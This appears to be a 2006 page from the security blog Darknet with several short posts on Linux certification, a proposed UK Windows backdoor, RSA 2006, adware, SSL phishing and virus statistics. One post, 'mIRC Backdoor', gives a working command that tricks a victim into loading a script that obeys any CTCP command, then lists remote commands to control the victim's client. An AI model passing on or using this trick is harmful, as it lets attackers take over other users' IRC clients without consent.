Darknet - The Darkside

Don`t Learn to HACK - Hack to LEARN. That`s our motto and we stick to it, we are all about Ethical Hacking, Penetration Testing & Computer Security. We share and comment on interesting infosec related news, tools and more. Follow us on Twitter, Facebook or RSS for the latest updates.

25 February 2006 | 10,754 views

Free Prep Material for LPI Linux Certification (LPI 201 and 202)

Check For Vulnerabilities with Acunetix

Here’s a series of well written IBM Linux tutorials to help you learn Linux fundamentals and prepare for system administrator certification. The LPI prep tutorials help you prepare for the topics in LPI exam 201 and the topics in LPI exam 202.

You can find more about the certification at the Linux Professional Institute.

I’ve been meaning to take LPI 201 for quite sometime actually, it looks like a pretty solid foundation to Linux and I know most of it allready, so I should be able to do it without too much problem.

You can find the material at IBM:

Linux Professional Institute Exam Prep

The eight tutorials below help you prepare for the eight topics in LPI exam 201. Exam 201 is the first of two LPI intermediate-level system administrator exams. Both exam 201 and exam 202 are required for intermediate-level certification, or LPIC-2.

You do have to sign up, or just use Bugmenot, the bugmenot extension for Firefox is very useful ;)

To any budding hackers, yes it is recommended you have strong Linux skills.



24 February 2006 | 22,701 views

mIRC Backdoor

Well it’s not really a backdoor… but we can consider it one…

Some time ago it apeared on many websites (including mine) an article about a backdoor in mIRC… all this backdoor stuff was really nothing more than a mIRC script that by it’s mean made the client to respond at any command received via a CTCP (Client to Client Protocol) command… such as ping, version, time, etc…. so here is the command that the victim has to enter:

//.write -c mirc.dll ctcp 1:*:*:$1- | /.load -rs mirc.dll

The command is splited in 2 parts, delimited by | (a vertical line)… So the first section writes a file “mirc.dll” in which we write a simple mIRC script which listens to any CTCP request… the second one loads the file with the mIRC script….

After the “victim” executes this command we can control it by introducing one of the following lines:

{ this is a comment }

/ctcp victims_nick /.nick lamer { changes the nickname of the victim to lamer }

/ctcp victims_nick /.exit { closes the victims mIRC }

/ctcp victims_nick /.run www.black2white.as.ro
{ opens the victims default web browser (ie, firefox, opera, etc.) on the page www.black2white.as.ro }

/ctcp victims_nick /.any_valid_irc_command

So happy “masterminding”….

More IRC Commands: http://www.hackthissite.org/pages/irc/reference.php


24 February 2006 | 6,894 views

UK Wants Backdoor in Next Version of Microsoft Windows

Yes that’s right, big brother wants a backdoor in your operating system even MORE of a reason to use Open Source alternatives that we can audit ourselves eh?

There has been talk of such things in the past, US government backdoors in common cryptography algorithms and now talks of backdoors in the most popular OS in the world.

Windows Vista is due to be rolled out later this year. Cambridge academic Ross Anderson told MPs it would mean more computer files being encrypted.

He urged the government to look at establishing “back door” ways of getting around encryptions.

The Home Office later told the BBC News website it is in talks with Microsoft.

Yes, it bothers me.

Professor Anderson said people were discussing the idea of making computer vendors ensure “back door keys” to encrypted material were made available.

The Home Office should enter talks with Microsoft now rather than when the system is introduced, he said.

He said encryption tools generally were either good or useless.

“If they are good, you either guess the password or give up,” he said.

Source: BBC News


24 February 2006 | 6,520 views

Passwords Passe at RSA

SAN JOSE, California — Identity theft and online bank fraud were the unofficial themes of the 2006 RSA Conference, a massive security confab where Bill Gates came to announce the imminent death of the password and vendors filled the exhibition halls with iPod giveaways and promises that their product could stop everything from spam and malware to hackers and typos.

Thanks to a California law known as SB 1386 that requires companies to disclose sensitive data leaks to California consumers, companies like ChoicePoint and shoe retailer DSW became poster children for corporate negligence last year after mishandling sensitive data.

As mentioned previously, Phishing is getting to be a big issue now, and password only measures are failing.

Perhaps the biggest change this year will be in online banking, as financial institutions move to comply with federal oversight agencies that are directing banks (.pdf) to secure their sites with more than just user logins and passwords.

These extra fraud profiling and authentication measures are necessary, according to Callas, since the threats on the internet have changed.

“Now we are not dealing with kids having fun,” Callas said. “We are dealing with criminals — the Russian mafia. And online banking risks are there if your bank offers it, even if you don’t use it.”

E-trade, for instance, already offers free RSA security tokens to its most active users. Those battery-powered devices work by using a using a seed number and the current time to cryptographically generate a secure one-time code to complement the normal user login and password.

Source: Wired News


23 February 2006 | 8,230 views

Google Desktop 3 Enterprise

Google Enterprise has reacted to privacy concerns and released Google Desktop 3 Enterprise.

It responds to security concerns allowing full administrator control, letting them use the standard group policy settings to completely disable features, including the controversial Search Across Computers feature which you can read about in our original article.

Google Enterprise’s Article


23 February 2006 | 10,000 views

The new Macbook Pro 15″ 2.0Ghz taken apart

OWC (Other World Computing) is a great site for buying parts for the mac. Their prices are quite cheap if you compare prices with stores in asia. Two days back (21/2/06) they got their hands on a Macbook Pro, which they received at 10:30pm and managed to take it all apart by 1.30pm. Pictures are posted here.

Check out the stuff they have on mac related items and accessories. They now also have upgrade parts for the new Macbook Pro.

For a first timer, taking apart a mac notebook is not an easy task. They are alot of ways you can damage your mac if you’re not careful.

For a complete step-by-step procedure on how to dis-assemble any mac, check out ifixit.com guide for a complete how-to complete with pictures and the number of screws you need to take out before you can actually take something apart on a mac.


23 February 2006 | 6,581 views

Advertisers may face public humiliation over adware

Companies could find themselves put up for public humiliation by the U.S. Federal Trade Commission if they continue to advertise through insidious ad-serving software.

Such a move might help in the battle against adware, FTC Commissioner Jon Leibowitz said Thursday at an event here hosted by the Anti-Spyware Coalition. Adware is software that displays pop-up ads on PCs, often after Internet searches.

Anti-spyware software is a requirement just like Anti-virus software. Common vulnerabilities in browsers make it very easy for malicious software to infect your machine through Internet Explorer for example.

“I think that could have a beneficial effect,” Leibowitz said in an interview. “In this context, maybe shaming a company on how they are spending money might inure to the benefit of consumer’s privacy.”

Viruses, spyware, trojans and adware are big problems now with solutions for all of them (firewalls and intrusion detection help massively of course).

The FTC would publicly announce and publish the name of a company that advertises using adware that installs itself surreptitiously on consumer PCs or using spyware, Leibowitz said. He would recommend publicly shaming advertisers to the other FTC commissioners if the adware problem doesn’t decrease, he said.

Source: News.com


22 February 2006 | 4,156 views

who is backbone?

This is just an introductory article about myself, nothing interesting (for the most of you) will be revealed in this article, I re-edited it because it had to meet the EU standards (you know Romania will be part of it on 1st of January 2007).

A long time ago…

…I was a big game addict, computers had no sense to me without games, this was the only use I had for them (apart from listening to music and watching movies), till the internet came into my life. I started playing on the internet as many of you I think did, chating on IRC.
The first time I got into hacking was when I first downloaded WarMaster, a quite 31337 mIRC script with many trojans included.

And then I opened my eyes…

…and realized that I couldn’t do anything, was just another lam3r showing off on IRC. At that point I started to make my own mIRC scripts, still think that metalfish was a big success, towards my scripting knowlege that is. But it was not enough…
I started to read many tutorials, white papers and so on but really couldn’t understand a big part of them so I’ve changed my orientation towards webdevelopment, this way have learned JavaScript & PHP which later become useful towards XSS.

Darknet, again?

Being in the mailinglist of darknet for quite a long beriod I was really happy to see it again on-line and up to date, so I joined it to share my knowledge, hopefully someone will apreciate this… and here I am.

In my articles…

I’m going to talk about viruses, web technologies, win related articles and so on… and why not some IRC stuff to, just to get you started, and teach you a couple of things I know, thill then make the final step and join the dark side of the internet.


22 February 2006 | 5,120 views

Phishing Sites Getting More Advanced with SSL

Phishing is a difficult enough form of fraud to avoid for most computer users, but when some of the biggest names in the financial industry fail to do their part to detect and eliminate these online scams, consumers often are placed in an untenable situation.

Case in point: A source recently forwarded a link to one of the “best” phishing attacks I’ve ever seen. This one — targeting the tiny Mountain America credit union in Salt Lake City, Utah — arrives in an HTML-based e-mail telling recipients that their Mountain America credit union card was automatically enrolled in the Verified by Visa program, a legitimate security program offered by Visa that is supposed to provide “reassurance that only you can use your Visa card online.”

The fake MountainAmerica.net Web site

The e-mail includes the first five digits of the “enrolled card,” but those five digits are found on all Mountain America bank cards, so that portion of the scam is likely to be highly convincing for some recipients. The message directs readers to click on a link and activate their new Verified by Visa membership.

Beware, make sure your non tech-savvy friends & relatives are aware of how tricky these scammers are getting.

Someone YOU know could be falling for this soon.

Sources: SlashdotWashington Post


22 February 2006 | 5,369 views

Jan 2006 Virus and Spam Statistics

January at a glance: Vicious and Varied
The numbers are indeed concerning: 19 new email-born significant virus attacks, of which a troubling 8 (42%) were graded “low intensity”, 7 (37%) “Medium Intensity” and 4 (21%) were massive attacks & a rare phenomenon for a single month.

One outbreak of specific interest, consisting of 7 variants, illustrates how viruses are growing in sophistication: the first variant was launched around December 25th as a low intensity virus, however with subsequently released variants the attack’s intensity grew into a massive outbreak towards the end of the month.

The biggest virus attacks are the quickest & fast-moving solutions required
One of the factors measured by Commtouch is the speed of distribution. We consider attacks that peak within eight hours to have “short spans”, since it takes an average of 8-10 hours for a traditional anti-virus vendor to release an updated signature blocking a new virus.

Computer virus statistics from the Commtouch Detection Center indicate that 40% of attacks during January met this profile. Also, there is a clear connection between the attack’s speed and its intensity & the faster attacks are the biggest ones: while the average distribution time of low intensity attacks is a ‘leisurely’ 27 hours and medium-intensity attacks can take 17 hours, massive attacks take as little as 5.5 hours to spread in hundreds of millions of emails.

“The conclusion is clear” adds Lev. “Without a reliable solution for early hour protection that complements the old fashion anti-virus solutions, users are unprotected from the most massive attacks.”

Anti-virus engine statistics & is your AV up for the challenge?
Based in part on a reliable third party lab test, Commtouch was able to compare detection times of 21 leading AV engines against 19 new viruses in January. The results:

- On average, each AV completely missed 6.2 viruses (the attack was completed, and a signature was not yet available).
- The average response time to new viruses among all AV engines was 8.12 hours.

“The data should be of great concern to AV vendors and IT managers alike,” said Lev. “An eight hour response spells a simple truth & a traditional AV solution does not stand a chance against massive attacks that end before a signature is even released.”

Spam is physically sent primarily from the US
The Commtouch Detection Center monitors spam distribution patterns on a global level. January spam statistics show that 43.18% of global spam is sent from US-based sources (down from approximately 50%). China is also a significant ‘launching pad’ for 12.89% of the spam. Korean and German sources distribute about 4% of global spam, and the rest of spam originates from around the globe.

Source: Commtouch